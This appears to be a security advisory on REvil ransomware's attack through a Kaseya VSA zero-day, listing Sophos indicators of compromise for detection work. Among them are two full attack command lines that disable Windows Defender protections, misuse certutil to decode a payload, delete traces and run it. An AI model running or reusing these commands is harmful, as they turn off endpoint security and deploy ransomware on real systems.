TeamHood 
It was found that the Zero day vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure (DIVD), and Kaseya was validating the patch before they rolled it out to customers.
The zero-day vulnerability used to breach on-premise Kaseya VSA servers was in the process of being fixed, just as the REvil ransomware gang used it to perform a massive attack on its customers.
As Kaseya is primarily used by Managed Service Providers (MSPs) this approach gave the attackers privileged access to the devices of the MSP’s customers. Some of the functionality of a VSA Server is the deployment of software and automation of IT tasks. As such, it has a high level of trust on customer devices.
“After this crisis, there will be the question of who is to blame. From our side, we would like to mention Kaseya has been very cooperative. Once Kaseya was aware of our reported vulnerabilities, we have been in constant contact and cooperation with them. When items in our report were unclear, they asked the right questions,” said DIVD Victor Gevers
Recommendation from Kaseya
Currently, Kaseya is indicating this is impacting a number of on premises customers and are advising to shutdown their VSA server until further notice from the vendor.
Indicators of Compromise Courtesy Sophos
Sophos Detections
- Troj/Ransom-GIP
- Troj/Ransom-GIQ
- HPmal/Sodino-A
- Detected in C:\Windows\MsMpEng.exe
- DynamicShellcode
- hmpa.exploit.prevented.1
- Cryptoguard
- cryptoguard.file.detected.1
Process Data:
- “C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 6258 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
- Parent Path – C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe
- “C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
- Parent Path – C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe
Files involved
- C:\windows\cert.exe
- 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
- C:\windows\msmpeng.exe
- 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
- C:\kworking\agent.crt
- C:\Windows\mpsvc.dll
- 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
- C:\kworking\agent.exe
- d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
Registry Keys
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter
Ransomware Extension
- <victim ID>-readme.txt
Domains
- ncuccr[.]org
- 1team[.]es
- 4net[.]guru
- 35-40konkatsu[.]net
- 123vrachi[.]ru
- 4youbeautysalon[.]com
- 12starhd[.]online
- 101gowrie[.]com
- 8449nohate[.]org
- 1kbk[.]com[.]ua
- 365questions[.]org
- 321play[.]com[.]hk
- candyhouseusa[.]com
- andersongilmour[.]co[.]uk
- facettenreich27[.]de
- blgr[.]be
- fannmedias[.]com
- southeasternacademyofprosthodontics[.]org
- filmstreamingvfcomplet[.]be
- smartypractice[.]com
- tanzschule-kieber[.]de
- iqbalscientific[.]com
- pasvenska[.]se
- cursosgratuitosnainternet[.]com
- bierensgebakkramen[.]nl
- c2e-poitiers[.]com
- gonzalezfornes[.]es
- tonelektro[.]nl
- milestoneshows[.]com
- blossombeyond50[.]com
- thomasvicino[.]com
- kaotikkustomz[.]com
- mindpackstudios[.]com
- faroairporttransfers[.]net
- daklesa[.]de
- bxdf[.]info
- simoneblum[.]de
- gmto[.]fr
- cerebralforce[.]net
- myhostcloud[.]com
- fotoscondron[.]com
- sw1m[.]ru
- homng[.]net
